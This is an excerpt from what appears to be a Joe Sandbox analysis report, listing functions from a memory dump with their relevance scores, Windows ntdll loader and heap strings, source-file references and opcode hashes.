                                                                                                                                                  • Opcode ID: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                  • Instruction ID: 89a6864344931651f7c1d94e75dfee5177d8d8f37e1ce78b57eba22db1914d0d
                                                                                                                                                  • Opcode Fuzzy Hash: ad2bea92d1820031a419bb6d557898911dcda175a67065bbbbe3f068c9f0e480
                                                                                                                                                  • Instruction Fuzzy Hash: 3FA19D359012299BDB25CF68D884BA9B7B6BF98314F1841E9D908EB251D730DF81CFD1
                                                                                                                                                  Function 01834AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01873437
                                                                                                                                                  • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01873456
                                                                                                                                                  • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0187342A
                                                                                                                                                  • RtlDeactivateActivationContext, xrefs: 01873425, 01873432, 01873451
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                  • API String ID: 0-1245972979
                                                                                                                                                  • Opcode ID: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                  • Instruction ID: 99de1c422a06b1d805dc27b9a31e3eaf3aaf90ce5c94d5a65e17ef0a51302184
                                                                                                                                                  • Opcode Fuzzy Hash: 762a9fda0fa9dc03271d8bf8c2b1d9673689446fbfcb5cc35dc991d70328559c
                                                                                                                                                  • Instruction Fuzzy Hash: 556122366007069BD72ACF1DC881B2AB7E5FFA4B24F188519EC55DB241CB30EA01CBD2
                                                                                                                                                  Function 018064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01860FE5
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01861028
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018610AE
                                                                                                                                                  • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0186106B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                                  • API String ID: 0-1468400865
                                                                                                                                                  • Opcode ID: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                  • Instruction ID: 5372cd93f26b4e3b2f11181f7e43f82513d73ae687e59cd5d263fcca0ee6035a
                                                                                                                                                  • Opcode Fuzzy Hash: 1f70b48e44922d9c525de04c02619b4441c4cbb0894a2405ff2a94908a43465e
                                                                                                                                                  • Instruction Fuzzy Hash: 5D71CEB19043499FCB62DF18C884F977BA8AF95764F500468F948CB287E735D688CB92
                                                                                                                                                  Function 0182245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0186A992
                                                                                                                                                  • apphelp.dll, xrefs: 01822462
                                                                                                                                                  • LdrpDynamicShimModule, xrefs: 0186A998
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0186A9A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-176724104
                                                                                                                                                  • Opcode ID: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                  • Instruction ID: 0bb94acd54f12448b67b6659d80231dd601991f887e81d36cae1b3c5dd9167f0
                                                                                                                                                  • Opcode Fuzzy Hash: b20c1276d35a2d966b1333c7e3e4d4be99ee75874d87f073c806907312da8d66
                                                                                                                                                  • Instruction Fuzzy Hash: 53315971A00201ABDB369F5DD885E6AB7BAFB84B04F25001EF911F7245D7709B81CF80
                                                                                                                                                  Function 018129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0181327D
                                                                                                                                                  • HEAP[%wZ]: , xrefs: 01813255
                                                                                                                                                  • HEAP: , xrefs: 01813264
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                                  • API String ID: 0-617086771
                                                                                                                                                  • Opcode ID: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                  • Instruction ID: 255149989574b59d6627537baed293a13a59a5bd73ae7efebf40e210ca6abd83
                                                                                                                                                  • Opcode Fuzzy Hash: 2c6174c750daec04d0b244a3a051f3e3b69206ddb4b0ca40591feef2b2589f6a
                                                                                                                                                  • Instruction Fuzzy Hash: 1292BC72A042499FDB25CF68C440BAEBBF6FF48314F188459E849EB35AD734AA45CF50
                                                                                                                                                  Function 01810770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-4253913091
                                                                                                                                                  • Opcode ID: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                                                  • Instruction ID: 6f08f812173736be08281aac73a842b9df27c7b1c598a6683b3d6d8dc036d6b7
                                                                                                                                                  • Opcode Fuzzy Hash: 2cd96465d25aad1e64d7d7d7f783819d5cb7584534c4c707bf0578128cd39176
                                                                                                                                                  • Instruction Fuzzy Hash: E9F19B71A0060ADFEB25CF68C894B6AB7FAFF44304F148169E516DB385D734EA81CB91
                                                                                                                                                  Function 01826962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $@
                                                                                                                                                  • API String ID: 0-1077428164
                                                                                                                                                  • Opcode ID: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                                                  • Instruction ID: 121959c4d56d6271fe043719fe9020a5dbb26d9bfeb18ea54b175bb95b893214
                                                                                                                                                  • Opcode Fuzzy Hash: f05ca17ccca72e91e16cfa24de274160899dc10839f4ec4ad02343ccc44dc921
                                                                                                                                                  • Instruction Fuzzy Hash: DCC29F716083559FDB26CF29C880BABBBE5AF98714F04892DF9C9C7241E734DA44CB52
                                                                                                                                                  Function 017FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                  • Opcode ID: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                                                  • Instruction ID: ab8a491542b8b137baf9bcb716cc47f1e111848a9d63bcb67536220637d09bcd
                                                                                                                                                  • Opcode Fuzzy Hash: 36ca82d8da647c0796dbc7e3abaf112d2ec8a5f26d9478007833055d965afa7a
                                                                                                                                                  • Instruction Fuzzy Hash: 67A16A759016299BDB719F68CC88BEABBB8EF44700F1001EAEA08E7251D7359F84CF51
                                                                                                                                                  Function 01820BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpCheckModule, xrefs: 0186A117
                                                                                                                                                  • Failed to allocated memory for shimmed module list, xrefs: 0186A10F
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 0186A121
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-161242083
                                                                                                                                                  • Opcode ID: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                                                  • Instruction ID: 793f3410c555fe526a728b93bec754035b785b8f06b0cdd06526d00c2e703b19
                                                                                                                                                  • Opcode Fuzzy Hash: 2ca8451d484d5d8354f2b51e9b2bec836d2be777171baff77d383c14b49c5452
                                                                                                                                                  • Instruction Fuzzy Hash: 747190B5A00609DBDB2ADF6CC985ABEB7F8FB44704F14402DE902E7255E734AB81CB51
                                                                                                                                                  Function 01810A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-1334570610
                                                                                                                                                  • Opcode ID: 98a927018807a468e7cdc475414b8e4e6369e59e48521230c9b5aa165269117f
                                                                                                                                                  • Instruction ID: 79deba8033fd5394da245bc3f711d6ea87cc552d150dbba09e01973d1716b54b
                                                                                                                                                  • Opcode Fuzzy Hash: 98a927018807a468e7cdc475414b8e4e6369e59e48521230c9b5aa165269117f
                                                                                                                                                  • Instruction Fuzzy Hash: EB61B172600305DFDB29CF28C940B6ABBE9FF45708F14855DE455CB296D770EA81CB91
                                                                                                                                                  Function 0183C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializePerUserWindowsDirectory, xrefs: 018782DE
                                                                                                                                                  • Failed to reallocate the system dirs string !, xrefs: 018782D7
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 018782E8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-1783798831
                                                                                                                                                  • Opcode ID: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                                                  • Instruction ID: 8455e521a7b43ea92bdb2d4f7ac68ca48246f16f84c432ca28eb912573770eef
                                                                                                                                                  • Opcode Fuzzy Hash: 9b7024e0e6c09d72b48b7556c4fcc6b8f787ba6cae2827fcf68b1e0c44981b41
                                                                                                                                                  • Instruction Fuzzy Hash: B341F0B2540305ABD722EB6CD848F5B77E8AF84750F14492EFA54E3294EB74DA00CBD2
                                                                                                                                                  Function 018BC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • @, xrefs: 018BC1F1
                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 018BC1C5
                                                                                                                                                  • PreferredUILanguages, xrefs: 018BC212
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                  • API String ID: 0-2968386058
                                                                                                                                                  • Opcode ID: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                                                  • Instruction ID: 247a764581b4f9017ca81872359c8791832cebfb0b122956248ac8789976e7ca
                                                                                                                                                  • Opcode Fuzzy Hash: 46980622456f6774416e6f1f58c1d3a04a98594b1bba38b1e3dc449a16e9458b
                                                                                                                                                  • Instruction Fuzzy Hash: E7416272E0060EEBEB11DBD8C891FEEBBB8AB14704F14406AEA09F7350D7749B458B51
                                                                                                                                                  Function 01894144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                  • API String ID: 0-1373925480
                                                                                                                                                  • Opcode ID: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                                                  • Instruction ID: 54297f3dbf8eaf2993df8eecf6dc33401ae9411ea4e76da3954b5aca6538c510
                                                                                                                                                  • Opcode Fuzzy Hash: ded35d823052db470f9a22e4ca208a38b0dedbc178ed24fde6d5b917a9976bf9
                                                                                                                                                  • Instruction Fuzzy Hash: DA412672A046488BEF26DBD8CA44BADBBB9FF55344F180499D901EB791DB358B02CB11
                                                                                                                                                  Function 01884755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0188488F
                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01884888
                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01884899
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                  • Opcode ID: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                                                  • Instruction ID: 1aabd870db46bf3f26d9ccaa59abf1040e73aee3c6cfa9781a670716ad550576
                                                                                                                                                  • Opcode Fuzzy Hash: 11065b607ee6af15567f2e4fa2e74b166c79d781f5b76ede48d983fdb1bd96bc
                                                                                                                                                  • Instruction Fuzzy Hash: 0A41D133A102568BCB21FE1CD940B26BBE4BF49B54F06026DED48E7312E730EA00CB91
                                                                                                                                                  Function 01810BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-2558761708
                                                                                                                                                  • Opcode ID: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                                                  • Instruction ID: 93e43523e2c189f6760efbd52cab3c0507f44658beef9c09ac5b916aee0910ad
                                                                                                                                                  • Opcode Fuzzy Hash: 339e6b037d4c4349935a517f397917a43e542e375e1ce42e1bc15714b77c7c2a
                                                                                                                                                  • Instruction Fuzzy Hash: 0A11D2B2315106DFD719CA18C894F66F3A8EF40B59F18815DF406CB259DB34DA80C751
                                                                                                                                                  Function 018820DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpInitializationFailure, xrefs: 018820FA
                                                                                                                                                  • Process initialization failed with status 0x%08lx, xrefs: 018820F3
                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 01882104
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                  • API String ID: 0-2986994758
                                                                                                                                                  • Opcode ID: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                                                  • Instruction ID: dedf86292b0240d71f240dc1f9750d808a0036d2ec892b91cd5e207af72d98b8
                                                                                                                                                  • Opcode Fuzzy Hash: ea9d4d16eb4290bfdaecab639244dadf1eff68fb0ed81b90529629d1b7792c90
                                                                                                                                                  • Instruction Fuzzy Hash: F2F0C279680708ABE724E64CCC56F9977ADFB44B54F60006DFA00EB682D6B0BB40CA91
                                                                                                                                                  Function 018103E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: #%u
                                                                                                                                                  • API String ID: 48624451-232158463
                                                                                                                                                  • Opcode ID: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                                                  • Instruction ID: 63f137d6876da51e3eeb74cf5c3ef1c1e7e39a9f44be5834b9a45bba5f701738
                                                                                                                                                  • Opcode Fuzzy Hash: c67dae3fbd118639b0a8e6dbdec8e6c490926f9dc624566fc04f0d86ae25ca43
                                                                                                                                                  • Instruction Fuzzy Hash: D7713A72A0014A9FDB01DFA8C990BAEB7F8FF18704F144065E905EB255EA34EE41CBA1
                                                                                                                                                  Function 0180A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrResSearchResource Enter, xrefs: 0180AA13
                                                                                                                                                  • LdrResSearchResource Exit, xrefs: 0180AA25
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                                                  • API String ID: 0-4066393604
                                                                                                                                                  • Opcode ID: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                                                  • Instruction ID: 222be1ef098984274dd266c9d35e7f7b9aea9026275cd4b1c59f07dfa53f8659
                                                                                                                                                  • Opcode Fuzzy Hash: d4a640270a38aad54be8ebc7a90d9e0b73e3f4eb5846ecf1f63e21522b9ec6f5
                                                                                                                                                  • Instruction Fuzzy Hash: F4E17C71A0071DAFEF66CA9CCD90BAEBBBABF44314F14442AE901E7291D7349A41CB51
                                                                                                                                                  Function 018CA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: `$`
                                                                                                                                                  • API String ID: 0-197956300
                                                                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                  • Instruction ID: 018a78f0eff22b5f4842b94bed6e9f5932958b45289e75d576c61db92a2ebc1f
                                                                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                  • Instruction Fuzzy Hash: A9C1D53120434A9BE729CF28C841B6BBBE5BFD4B18F144A2DF696C7290E775D605CB42
                                                                                                                                                  Function 0187E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                  • Opcode ID: 913d515436c9dc9c34f424f77e9e4c4e9b2c91f5275991b1f62681e3721a4929
                                                                                                                                                  • Instruction ID: b00dd2c78e810bdd62b585d490f26c1e811f0e1b75670026d415b42ee46a09fc
                                                                                                                                                  • Opcode Fuzzy Hash: 913d515436c9dc9c34f424f77e9e4c4e9b2c91f5275991b1f62681e3721a4929
                                                                                                                                                  • Instruction Fuzzy Hash: 33615D71E043199FDB15DFA8C840BAEBBB9FB48744F1440ADE649EB251DB31EA40CB50
                                                                                                                                                  Function 018A43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$MUI
                                                                                                                                                  • API String ID: 0-17815947
                                                                                                                                                  • Opcode ID: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                                                  • Instruction ID: 4d8c0838df7c4eb6e7a686406848c759e39313d918542ba783660d93dc01a369
                                                                                                                                                  • Opcode Fuzzy Hash: 8607675cbd169dbc8deb7038d471d696a7b4919d34a24df69e58e05cabca2abb
                                                                                                                                                  • Instruction Fuzzy Hash: 4B513971D0161DAFEF11DFA9CC80AEEBBB9EB44754F54052AFA11F7280D6709A05CB60
                                                                                                                                                  Function 018004E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • kLsE, xrefs: 01800540
                                                                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0180063D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                                                  • API String ID: 0-2547482624
                                                                                                                                                  • Opcode ID: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                                                  • Instruction ID: 0b74e299e55be66835d088ad4763254e8702e10a7d5b6c135e859e49d400e9a0
                                                                                                                                                  • Opcode Fuzzy Hash: 545060195e2b811de51351494d70f6e11879a74e07222af0b791a264332a77b4
                                                                                                                                                  • Instruction Fuzzy Hash: 0851DE7150470A8FC766DF68C8407A3BBE5AF84340F10883EFAAAC7281E735D645CB92
                                                                                                                                                  Function 0180A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 0180A2FB
                                                                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 0180A309
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000003.00000002.1822408651.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_3_2_17d0000_IETC-24017.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
